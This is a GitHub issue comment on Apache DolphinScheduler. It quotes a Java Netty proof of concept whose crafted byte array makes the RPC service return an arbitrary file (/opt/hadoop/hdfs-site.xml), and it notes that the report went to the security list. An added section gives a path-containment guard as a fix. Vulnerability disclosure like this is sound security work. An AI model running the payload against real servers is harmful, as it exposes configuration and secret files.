xxjingcd commented on issue #13460:
URL: https://github.com/apache/dolphinscheduler/issues/13460#issuecomment-1415192912

   I 
   
   > ```java
   >     public static void main(String[] args) throws InterruptedException {
   >         EventLoopGroup group = new NioEventLoopGroup();
   >         Bootstrap b = new Bootstrap();
   >         b.group(group)
   >                 .channel(NioSocketChannel.class)
   >                 .handler(new ChannelInitializer<SocketChannel>() {
   >                     @Override
   >                     public void initChannel(SocketChannel ch) throws Exception {
   >                         ChannelPipeline p = ch.pipeline();
   >                         p.addLast(new NettyDecoder(), new EchoMsgHandler());
   >                     }
   >                 });
   >         // Start the client.
   >         ChannelFuture f = b.connect("127.0.0.1", 1234).sync();
   >         Channel channel = f.channel();
   > 
   >         // access /opt/hadoop/hdfs-site.xml
   >         byte[] bytes = {-66, 0, 6, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 12,
   >                 123, 34, 105, 116, 101, 109, 115, 34, 58, 123, 125, 125, 0, 0, 0, 36, 123, 34,
   >                 112, 97, 116, 104, 34, 58, 34, 47, 111, 112, 116, 47, 104, 97, 100, 111, 111,
   >                 112, 47, 104, 100, 102, 115, 45, 115, 105, 116, 101, 46, 120, 109, 108, 34,
   >                 125};
   >         ByteBuf mockAttackRequest = Unpooled.wrappedBuffer(bytes);
   >         channel.writeAndFlush(mockAttackRequest);
   >     }
   > ```
   > 
   > > The `bytes` array is the command to view the `/opt/hadoop/hdfs-site.xml` file, and the `bytes` array can easily be constructed with a few lines of code;
   > 
   > Through the above code, you will get the `/opt/hadoop/hdfs-site.xml` file, which is not a log file from the `Master` or `Worker`; that means a hacker can access any file at any position;
   > 
   > "DS interval" can be easily broken on network communications;
   
   I have sent the details of this attack example to `[email protected]`. @zhongjiajie


-- 
This is an automated message from the Apache Git Service.
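A defensive counterpart to the quoted request, added here as an example and not part of the issue thread or the DolphinScheduler code base: a server-side guard that only serves files that resolve inside the configured log directory, so a request naming an absolute path such as `/opt/hadoop/hdfs-site.xml`, or a `..` traversal, is refused before anything is read. The class name `LogPathGuard`, the temporary log root and the sample file names are assumptions made for the demonstration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

// Added example (assumed name, not DolphinScheduler code): contain every
// requested log path inside the configured log directory before reading it.
public final class LogPathGuard {
    private final Path logRoot;

    public LogPathGuard(Path logRoot) throws IOException {
        // Canonicalize once so symlinks in the root itself do not skew the comparison.
        this.logRoot = logRoot.toRealPath();
    }

    /** Returns the canonical file path if it lies inside the log root, otherwise throws. */
    public Path resolve(String requested) throws IOException {
        if (requested == null || requested.isEmpty()) {
            throw new IllegalArgumentException("empty log path");
        }
        // resolve() keeps an absolute argument as-is, so "/opt/..." does not become root-relative.
        Path candidate = logRoot.resolve(requested).normalize();
        if (!candidate.startsWith(logRoot)) {
            throw new SecurityException("path escapes log directory: " + requested);
        }
        // toRealPath() follows symlinks; a link inside the root that points outside is caught here.
        Path real = candidate.toRealPath();
        if (!real.startsWith(logRoot)) {
            throw new SecurityException("symlink escapes log directory: " + requested);
        }
        if (!Files.isRegularFile(real)) {
            throw new IllegalArgumentException("not a regular file: " + requested);
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample: a throwaway log root with one legitimate log file.
        Path root = Files.createTempDirectory("ds-logs");
        Files.write(root.resolve("worker.log"), "ok".getBytes());
        LogPathGuard guard = new LogPathGuard(root);
        System.out.println("accepted: " + guard.resolve("worker.log"));
        for (String bad : new String[] {"/opt/hadoop/hdfs-site.xml", "../hdfs-site.xml"}) {
            try {
                guard.resolve(bad);
            } catch (SecurityException | IOException e) {
                System.out.println("rejected: " + bad + " (" + e.getMessage() + ")");
            }
        }
    }
}
```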